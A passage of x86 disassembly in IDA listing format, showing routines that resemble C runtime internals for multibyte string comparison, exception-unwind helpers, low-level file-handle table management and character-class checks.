		jmp	loc_40F0D8
; ---------------------------------------------------------------------------

loc_40EFD6:				; CODE XREF: sub_40EF87+27j
		cmp	[ebp+arg_0], ebx
		jnz	short loc_40F009
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40EFFF
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EFFF:				; CODE XREF: sub_40EF87+6Fj
		mov	eax, 7FFFFFFFh
		jmp	loc_40F0D8
; ---------------------------------------------------------------------------

loc_40F009:				; CODE XREF: sub_40EF87+52j
		push	esi
		mov	esi, [ebp+arg_4]
		cmp	esi, ebx
		jnz	short loc_40F03F
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40F035
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F035:				; CODE XREF: sub_40EF87+A5j
		mov	eax, 7FFFFFFFh
		jmp	loc_40F0D7
; ---------------------------------------------------------------------------

loc_40F03F:				; CODE XREF: sub_40EF87+88j
					; sub_40EF87+13Cj
		mov	eax, [ebp+arg_0]
		movzx	cx, byte ptr [eax]
		dec	[ebp+arg_8]
		movzx	ecx, cx
		movzx	edx, cl
		inc	eax
		test	byte ptr [edx+edi+1Dh],	4
		mov	[ebp+arg_0], eax
		jz	short loc_40F086
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40F070
		movzx	eax, byte ptr [esi]
		xor	ecx, ecx
		test	byte ptr [eax+edi+1Dh],	4
		jnz	short loc_40F0C9
		movzx	eax, ax
		jmp	short loc_40F0B6
; ---------------------------------------------------------------------------

loc_40F070:				; CODE XREF: sub_40EF87+D6j
		mov	al, [eax]
		cmp	al, bl
		jnz	short loc_40F07A
		xor	ecx, ecx
		jmp	short loc_40F086
; ---------------------------------------------------------------------------

loc_40F07A:				; CODE XREF: sub_40EF87+EDj
		xor	edx, edx
		inc	[ebp+arg_0]
		mov	dh, cl
		mov	dl, al
		movzx	ecx, dx

loc_40F086:				; CODE XREF: sub_40EF87+D1j
					; sub_40EF87+F1j
		movzx	ax, byte ptr [esi]
		movzx	eax, ax
		movzx	edx, al
		inc	esi
		test	byte ptr [edx+edi+1Dh],	4
		jz	short loc_40F0B6
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40F0A1

loc_40F09D:				; CODE XREF: sub_40EF87+121j
		xor	eax, eax
		jmp	short loc_40F0B6
; ---------------------------------------------------------------------------

loc_40F0A1:				; CODE XREF: sub_40EF87+114j
		mov	dl, [esi]
		dec	[ebp+arg_8]
		cmp	dl, bl
		jz	short loc_40F09D
		xor	ebx, ebx
		mov	bh, al
		inc	esi
		mov	bl, dl
		movzx	eax, bx
		xor	ebx, ebx

loc_40F0B6:				; CODE XREF: sub_40EF87+E7j
					; sub_40EF87+10Fj ...
		cmp	ax, cx
		jnz	short loc_40F0DC
		cmp	cx, bx
		jz	short loc_40F0C9
		cmp	[ebp+arg_8], ebx
		jnz	loc_40F03F

loc_40F0C9:				; CODE XREF: sub_40EF87+E2j
					; sub_40EF87+137j
		cmp	[ebp+var_4], bl
		jz	short loc_40F0D5
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40F0D5:				; CODE XREF: sub_40EF87+145j
		xor	eax, eax

loc_40F0D7:				; CODE XREF: sub_40EF87+B3j
					; sub_40EF87+15Ej ...
		pop	esi

loc_40F0D8:				; CODE XREF: sub_40EF87+3Dj
					; sub_40EF87+4Aj ...
		pop	edi

loc_40F0D9:				; CODE XREF: sub_40EF87+10j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40F0DC:				; CODE XREF: sub_40EF87+132j
		sbb	eax, eax
		and	eax, 2
		dec	eax
		cmp	[ebp+var_4], bl
		jz	short loc_40F0D7
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40F0D7
sub_40EF87	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F0F0	proc near		; CODE XREF: sub_4087BF+1D1p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40EF87
		add	esp, 10h
		retn
sub_40F0F0	endp

; ---------------------------------------------------------------------------
		align 4
		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		push	ebp
		push	0
		push	0
		push	offset loc_40F120
		push	dword ptr [ebp+8]
		call	sub_413F36

loc_40F120:				; DATA XREF: .text:0040F113o
		pop	ebp
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_40F128:				; DATA XREF: sub_40F16D+Bo
					; .text:0040F1FAo
		mov	ecx, [esp+4]
		test	dword ptr [ecx+4], 6
		mov	eax, 1
		jz	short locret_40F16C
		mov	eax, [esp+14h]
		mov	ecx, [eax-4]
		xor	ecx, eax
		call	sub_402C9E
		push	ebp
		mov	ebp, [eax+10h]
		mov	edx, [eax+28h]
		push	edx
		mov	edx, [eax+24h]
		push	edx
		call	sub_40F16D
		add	esp, 8
		pop	ebp
		mov	eax, [esp+8]
		mov	edx, [esp+10h]
		mov	[edx], eax
		mov	eax, 3

locret_40F16C:				; CODE XREF: .text:0040F138j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_40F16D	proc near		; CODE XREF: .text:0040F154p

var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	esi
		push	edi
		mov	eax, [esp+0Ch+arg_0]
		push	ebp
		push	eax
		push	0FFFFFFFEh
		push	offset loc_40F128
		push	large dword ptr	fs:0
		mov	eax, dword_424064
		xor	eax, esp
		push	eax
		lea	eax, [esp+24h+var_20]
		mov	large fs:0, eax

loc_40F196:				; CODE XREF: sub_40F16D:loc_40F1DDj
		mov	eax, [esp+24h+arg_0]
		mov	ebx, [eax+8]
		mov	esi, [eax+0Ch]
		cmp	esi, 0FFFFFFFFh
		jz	short loc_40F1DF
		cmp	[esp+24h+arg_4], 0FFFFFFFFh
		jz	short loc_40F1B2
		cmp	esi, [esp+24h+arg_4]
		jbe	short loc_40F1DF

loc_40F1B2:				; CODE XREF: sub_40F16D+3Dj
		lea	esi, [esi+esi*2]
		mov	ecx, [ebx+esi*4]
		mov	[esp+24h+var_18], ecx
		mov	[eax+0Ch], ecx
		cmp	dword ptr [ebx+esi*4+4], 0
		jnz	short loc_40F1DD
		push	101h
		mov	eax, [ebx+esi*4+8]
		call	sub_40F21D
		mov	eax, [ebx+esi*4+8]
		call	sub_40F23C

loc_40F1DD:				; CODE XREF: sub_40F16D+57j
		jmp	short loc_40F196
; ---------------------------------------------------------------------------

loc_40F1DF:				; CODE XREF: sub_40F16D+36j
					; sub_40F16D+43j
		mov	ecx, [esp+24h+var_20]
		mov	large fs:0, ecx
		add	esp, 18h
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40F16D	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		mov	ecx, large fs:0
		cmp	dword ptr [ecx+4], offset loc_40F128
		jnz	short locret_40F213
		mov	edx, [ecx+0Ch]
		mov	edx, [edx+0Ch]
		cmp	[ecx+8], edx
		jnz	short locret_40F213
		mov	eax, 1

locret_40F213:				; CODE XREF: .text:0040F201j
					; .text:0040F20Cj
		retn

; =============== S U B	R O U T	I N E =======================================



sub_40F214	proc near		; CODE XREF: sub_40C4B0+1Ep
					; sub_40C4B0+40p
		push	ebx
		push	ecx
		mov	ebx, offset dword_424FB0
		jmp	short loc_40F228
sub_40F214	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F21D	proc near		; CODE XREF: sub_408B88+6Ep
					; sub_406C00+2099p ...

arg_0		= dword	ptr  4

		push	ebx
		push	ecx
		mov	ebx, offset dword_424FB0
		mov	ecx, [esp+8+arg_0]

loc_40F228:				; CODE XREF: sub_40F214+7j
		mov	[ebx+8], ecx
		mov	[ebx+4], eax
		mov	[ebx+0Ch], ebp
		push	ebp
		push	ecx
		push	eax
		pop	eax
		pop	ecx
		pop	ebp
		pop	ecx
		pop	ebx
		retn	4
sub_40F21D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F23C	proc near		; CODE XREF: sub_408B88+7Bp
					; sub_40F16D+6Bp
		call	eax
		retn
sub_40F23C	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F23F	proc near		; CODE XREF: sub_40E632+2BBp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		test	eax, eax
		push	esi
		push	edi
		jl	short loc_40F2A3
		cmp	eax, dword_437EA4
		jnb	short loc_40F2A3
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, eax
		sar	ecx, 5
		lea	edi, ds:437EC0h[ecx*4]
		mov	ecx, [edi]
		cmp	dword ptr [esi+ecx], 0FFFFFFFFh
		jnz	short loc_40F2A3
		cmp	dword_424050, 1
		push	ebx
		mov	ebx, [esp+0Ch+arg_4]
		jnz	short loc_40F299
		sub	eax, 0
		jz	short loc_40F290
		dec	eax
		jz	short loc_40F28B
		dec	eax
		jnz	short loc_40F299
		push	ebx
		push	0FFFFFFF4h
		jmp	short loc_40F293
; ---------------------------------------------------------------------------

loc_40F28B:				; CODE XREF: sub_40F23F+42j
		push	ebx
		push	0FFFFFFF5h
		jmp	short loc_40F293
; ---------------------------------------------------------------------------

loc_40F290:				; CODE XREF: sub_40F23F+3Fj
		push	ebx
		push	0FFFFFFF6h

loc_40F293:				; CODE XREF: sub_40F23F+4Aj
					; sub_40F23F+4Fj
		call	ds:off_41E0B8

loc_40F299:				; CODE XREF: sub_40F23F+3Aj
					; sub_40F23F+45j
		mov	eax, [edi]
		mov	[esi+eax], ebx
		xor	eax, eax
		pop	ebx
		jmp	short loc_40F2B9
; ---------------------------------------------------------------------------

loc_40F2A3:				; CODE XREF: sub_40F23F+8j
					; sub_40F23F+10j ...
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		and	dword ptr [eax], 0
		or	eax, 0FFFFFFFFh

loc_40F2B9:				; CODE XREF: sub_40F23F+62j
		pop	edi
		pop	esi
		retn
sub_40F23F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F2BC	proc near		; CODE XREF: sub_40900D+62p

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	ecx, ebx
		push	esi
		push	edi
		jl	short loc_40F324
		cmp	ecx, dword_437EA4
		jnb	short loc_40F324
		mov	esi, ecx
		and	esi, 1Fh
		imul	esi, 28h
		mov	eax, ecx
		sar	eax, 5
		lea	edi, ds:437EC0h[eax*4]
		mov	eax, [edi]
		add	eax, esi
		test	byte ptr [eax+4], 1
		jz	short loc_40F324
		cmp	dword ptr [eax], 0FFFFFFFFh
		jz	short loc_40F324
		cmp	dword_424050, 1
		jnz	short loc_40F31A
		sub	ecx, ebx
		jz	short loc_40F311
		dec	ecx
		jz	short loc_40F30C
		dec	ecx
		jnz	short loc_40F31A
		push	ebx
		push	0FFFFFFF4h
		jmp	short loc_40F314
; ---------------------------------------------------------------------------

loc_40F30C:				; CODE XREF: sub_40F2BC+46j
		push	ebx
		push	0FFFFFFF5h
		jmp	short loc_40F314
; ---------------------------------------------------------------------------

loc_40F311:				; CODE XREF: sub_40F2BC+43j
		push	ebx
		push	0FFFFFFF6h

loc_40F314:				; CODE XREF: sub_40F2BC+4Ej
					; sub_40F2BC+53j
		call	ds:off_41E0B8

loc_40F31A:				; CODE XREF: sub_40F2BC+3Fj
					; sub_40F2BC+49j
		mov	eax, [edi]
		or	dword ptr [esi+eax], 0FFFFFFFFh
		xor	eax, eax
		jmp	short loc_40F339
; ---------------------------------------------------------------------------

loc_40F324:				; CODE XREF: sub_40F2BC+Bj
					; sub_40F2BC+13j ...
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], ebx
		or	eax, 0FFFFFFFFh

loc_40F339:				; CODE XREF: sub_40F2BC+66j
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40F2BC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F33D	proc near		; CODE XREF: sub_40900D+7p
					; sub_40900D+2Fp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40F35D
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		retn
; ---------------------------------------------------------------------------

loc_40F35D:				; CODE XREF: sub_40F33D+7j
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jl	short loc_40F386
		cmp	eax, dword_437EA4
		jnb	short loc_40F386
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437EC0[ecx*4]
		add	eax, ecx
		test	byte ptr [eax+4], 1
		jnz	short loc_40F3AA

loc_40F386:				; CODE XREF: sub_40F33D+25j
					; sub_40F33D+2Dj
		call	sub_405DA6
		mov	[eax], esi
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 9
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40F3AA:				; CODE XREF: sub_40F33D+47j
		mov	eax, [eax]
		pop	esi
		retn
sub_40F33D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F3AE	proc near		; CODE XREF: sub_4090A1+7Fp
					; sub_40A90F+7Fp ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422DD0
		call	__SEH_prolog4
		mov	edi, [ebp+arg_0]
		mov	eax, edi
		sar	eax, 5
		mov	esi, edi
		and	esi, 1Fh
		imul	esi, 28h
		add	esi, dword_437EC0[eax*4]
		mov	[ebp+var_1C], 1
		xor	ebx, ebx
		cmp	[esi+8], ebx
		jnz	short loc_40F415
		push	0Ah
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[esi+8], ebx
		jnz	short loc_40F409
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_40F406
		mov	[ebp+var_1C], ebx

loc_40F406:				; CODE XREF: sub_40F3AE+53j
		inc	dword ptr [esi+8]

loc_40F409:				; CODE XREF: sub_40F3AE+3Fj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F445

loc_40F415:				; CODE XREF: sub_40F3AE+2Fj
		cmp	[ebp+var_1C], ebx
		jz	short loc_40F437
		mov	eax, edi
		sar	eax, 5
		and	edi, 1Fh
		imul	edi, 28h
		mov	eax, dword_437EC0[eax*4]
		lea	eax, [eax+edi+0Ch]
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection

loc_40F437:				; CODE XREF: sub_40F3AE+6Aj
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40F3AE	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F440	proc near		; DATA XREF: zcrshv4o:00422DE8o
		xor	ebx, ebx
		mov	edi, [ebp+8]
sub_40F440	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40F445	proc near		; CODE XREF: sub_40F3AE+62p
		push	0Ah
		call	sub_405EDF
		pop	ecx
		retn
sub_40F445	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F44E	proc near		; CODE XREF: sub_409164+3p
					; sub_40A9E1+3p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_437EC0[ecx*4]
		lea	eax, [ecx+eax+0Ch]
		push	eax
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		retn
sub_40F44E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F470	proc near		; CODE XREF: sub_40E632:loc_40E828p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

; FUNCTION CHUNK AT 0040F54C SIZE 000000BA BYTES

		push	18h
		push	offset dword_422DF0
		call	__SEH_prolog4
		or	[ebp+var_1C], 0FFFFFFFFh
		xor	edi, edi
		mov	[ebp+var_24], edi
		push	0Bh
		call	sub_405EF4
		pop	ecx
		test	eax, eax
		jnz	short loc_40F499
		or	eax, 0FFFFFFFFh
		jmp	loc_40F600
; ---------------------------------------------------------------------------

loc_40F499:				; CODE XREF: sub_40F470+1Fj
		push	0Bh
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi

loc_40F4A4:				; CODE XREF: sub_40F470+109j
		mov	[ebp+var_28], edi
		cmp	edi, 40h
		jge	loc_40F5F1
		mov	esi, dword_437EC0[edi*4]
		test	esi, esi
		jz	loc_40F57E

loc_40F4BF:				; CODE XREF: sub_40F470+CBj
		mov	[ebp+var_20], esi
		mov	eax, dword_437EC0[edi*4]
		add	eax, 500h
		cmp	esi, eax
		jnb	loc_40F572
		test	byte ptr [esi+4], 1
		jnz	short loc_40F538
		cmp	dword ptr [esi+8], 0
		jnz	short loc_40F51B
		push	0Ah
		call	sub_405FB7
		pop	ecx
		xor	ebx, ebx
		inc	ebx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	dword ptr [esi+8], 0
		jnz	short loc_40F512
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_40F50F
		mov	[ebp+var_24], ebx
		jmp	short loc_40F512
; ---------------------------------------------------------------------------

loc_40F50F:				; CODE XREF: sub_40F470+98j
		inc	dword ptr [esi+8]

loc_40F512:				; CODE XREF: sub_40F470+84j
					; sub_40F470+9Dj
		and	[ebp+ms_exc.disabled], 0
		call	sub_40F543

loc_40F51B:				; CODE XREF: sub_40F470+70j
		cmp	[ebp+var_24], 0
		jnz	short loc_40F538
		lea	ebx, [esi+0Ch]
		push	ebx
		call	ds:dword_41E164	; RtlEnterCriticalSection
		test	byte ptr [esi+4], 1
		jz	short loc_40F54C
		push	ebx
		call	ds:dword_41E168	; RtlLeaveCriticalSection

loc_40F538:				; CODE XREF: sub_40F470+6Aj
					; sub_40F470+AFj ...
		add	esi, 28h
		jmp	short loc_40F4BF
sub_40F470	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F53D	proc near		; DATA XREF: zcrshv4o:00422E14o
		mov	edi, [ebp-28h]
		mov	esi, [ebp-20h]
sub_40F53D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40F543	proc near		; CODE XREF: sub_40F470+A6p
		push	0Ah
		call	sub_405EDF
		pop	ecx
		retn
sub_40F543	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40F470

loc_40F54C:				; CODE XREF: sub_40F470+BFj
		cmp	[ebp+var_24], 0
		jnz	short loc_40F538
		mov	byte ptr [esi+4], 1
		or	dword ptr [esi], 0FFFFFFFFh
		mov	eax, esi
		sub	eax, dword_437EC0[edi*4]
		cdq
		push	28h
		pop	ecx
		idiv	ecx
		mov	ecx, edi
		shl	ecx, 5
		add	eax, ecx
		mov	[ebp+var_1C], eax

loc_40F572:				; CODE XREF: sub_40F470+60j
		cmp	[ebp+var_1C], 0FFFFFFFFh
		jnz	short loc_40F5F1
		inc	edi
		jmp	loc_40F4A4
; ---------------------------------------------------------------------------

loc_40F57E:				; CODE XREF: sub_40F470+49j
		push	28h
		push	20h
		call	sub_407D3A
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		test	eax, eax
		jz	short loc_40F5F1
		lea	ecx, ds:437EC0h[edi*4]
		mov	[ecx], eax
		add	dword_437EA4, 20h

loc_40F5A0:				; CODE XREF: sub_40F470+151j
		mov	edx, [ecx]
		add	edx, 500h
		cmp	eax, edx
		jnb	short loc_40F5C3
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		and	dword ptr [eax+8], 0
		add	eax, 28h
		mov	[ebp+var_20], eax
		jmp	short loc_40F5A0
; ---------------------------------------------------------------------------

loc_40F5C3:				; CODE XREF: sub_40F470+13Aj
		shl	edi, 5
		mov	[ebp+var_1C], edi
		mov	eax, edi
		sar	eax, 5
		mov	ecx, edi
		and	ecx, 1Fh
		imul	ecx, 28h
		mov	eax, dword_437EC0[eax*4]
		mov	byte ptr [eax+ecx+4], 1
		push	edi
		call	sub_40F3AE
		pop	ecx
		test	eax, eax
		jnz	short loc_40F5F1
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40F5F1:				; CODE XREF: sub_40F470+3Aj
					; sub_40F470+106j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F606
		mov	eax, [ebp+var_1C]

loc_40F600:				; CODE XREF: sub_40F470+24j
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40F470

; =============== S U B	R O U T	I N E =======================================



sub_40F606	proc near		; CODE XREF: sub_40F470+188p
					; DATA XREF: zcrshv4o:00422E08o
		push	0Bh
		call	sub_405EDF
		pop	ecx
		retn
sub_40F606	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F60F	proc near		; CODE XREF: sub_4091FC+31p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_422E18
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40F636
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40F62E:				; CODE XREF: sub_40F60F+4Dj
		or	eax, 0FFFFFFFFh
		jmp	loc_40F6E0
; ---------------------------------------------------------------------------

loc_40F636:				; CODE XREF: sub_40F60F+12j
		xor	ebx, ebx
		cmp	eax, ebx
		jl	short loc_40F644
		cmp	eax, dword_437EA4
		jb	short loc_40F65E

loc_40F644:				; CODE XREF: sub_40F60F+2Bj
					; sub_40F60F+6Dj
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40F62E
; ---------------------------------------------------------------------------

loc_40F65E:				; CODE XREF: sub_40F60F+33j
		mov	ecx, eax
		sar	ecx, 5
		lea	edi, ds:437EC0h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [edi]
		movzx	ecx, byte ptr [esi+ecx+4]
		and	ecx, 1
		jz	short loc_40F644
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		mov	eax, [edi]
		test	byte ptr [esi+eax+4], 1
		jz	short loc_40F6C2
		push	[ebp+arg_0]
		call	sub_40F33D
		pop	ecx
		push	eax
		call	ds:off_41E0B4
		test	eax, eax
		jnz	short loc_40F6B0
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	[ebp+var_1C], eax
		jmp	short loc_40F6B3
; ---------------------------------------------------------------------------

loc_40F6B0:				; CODE XREF: sub_40F60F+94j
		mov	[ebp+var_1C], ebx

loc_40F6B3:				; CODE XREF: sub_40F60F+9Fj
		cmp	[ebp+var_1C], ebx
		jz	short loc_40F6D1
		call	sub_405DA6
		mov	ecx, [ebp+var_1C]
		mov	[eax], ecx

loc_40F6C2:				; CODE XREF: sub_40F60F+80j
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40F6D1:				; CODE XREF: sub_40F60F+A7j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F6E6
		mov	eax, [ebp+var_1C]

loc_40F6E0:				; CODE XREF: sub_40F60F+22j
		call	__SEH_epilog4
		retn
sub_40F60F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F6E6	proc near		; CODE XREF: sub_40F60F+C9p
					; DATA XREF: zcrshv4o:00422E30o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40F6E6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F6F0	proc near		; CODE XREF: sub_40F73F+21p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F720
		lea	eax, [ebp+var_10]
		push	eax
		push	4
		push	[ebp+arg_0]
		call	sub_40D004
		add	esp, 0Ch
		jmp	short loc_40F730
; ---------------------------------------------------------------------------

loc_40F720:				; CODE XREF: sub_40F6F0+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 4

loc_40F730:				; CODE XREF: sub_40F6F0+2Ej
		cmp	[ebp+var_4], 0
		jz	short locret_40F73D
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F73D:				; CODE XREF: sub_40F6F0+44j
		leave
		retn
sub_40F6F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F73F	proc near		; CODE XREF: sub_409427+1B6p
					; sub_409427+3EFp ...

arg_0		= dword	ptr  4

		cmp	dword_428900, 0
		jnz	short loc_40F75A
		mov	eax, [esp+arg_0]
		mov	ecx, off_424668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 4
		retn
; ---------------------------------------------------------------------------

loc_40F75A:				; CODE XREF: sub_40F73F+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F6F0
		pop	ecx
		pop	ecx
		retn
sub_40F73F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F768	proc near		; CODE XREF: sub_40F7BC+23p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F79B
		lea	eax, [ebp+var_10]
		push	eax
		push	80h
		push	[ebp+arg_0]
		call	sub_40D004
		add	esp, 0Ch
		jmp	short loc_40F7AD
; ---------------------------------------------------------------------------

loc_40F79B:				; CODE XREF: sub_40F768+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 80h

loc_40F7AD:				; CODE XREF: sub_40F768+31j
		cmp	[ebp+var_4], 0
		jz	short locret_40F7BA
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F7BA:				; CODE XREF: sub_40F768+49j
		leave
		retn
sub_40F768	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F7BC	proc near		; CODE XREF: sub_409427+9DFp
					; sub_409427+AB7p

arg_0		= dword	ptr  4

		cmp	dword_428900, 0
		jnz	short loc_40F7D9
		mov	eax, [esp+arg_0]
		mov	ecx, off_424668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 80h
		retn
; ---------------------------------------------------------------------------

loc_40F7D9:				; CODE XREF: sub_40F7BC+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F768
		pop	ecx
		pop	ecx
		retn
sub_40F7BC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F7E7	proc near		; CODE XREF: sub_40F836+21p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F817
		lea	eax, [ebp+var_10]
		push	eax
		push	8
		push	[ebp+arg_0]
		call	sub_40D004
		add	esp, 0Ch
		jmp	short loc_40F827
; ---------------------------------------------------------------------------

loc_40F817:				; CODE XREF: sub_40F7E7+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 8

loc_40F827:				; CODE XREF: sub_40F7E7+2Ej
		cmp	[ebp+var_4], 0
		jz	short locret_40F834
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F834:				; CODE XREF: sub_40F7E7+44j
		leave
		retn
sub_40F7E7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F836	proc near		; CODE XREF: sub_409402+17p
					; sub_409427+13Cp ...

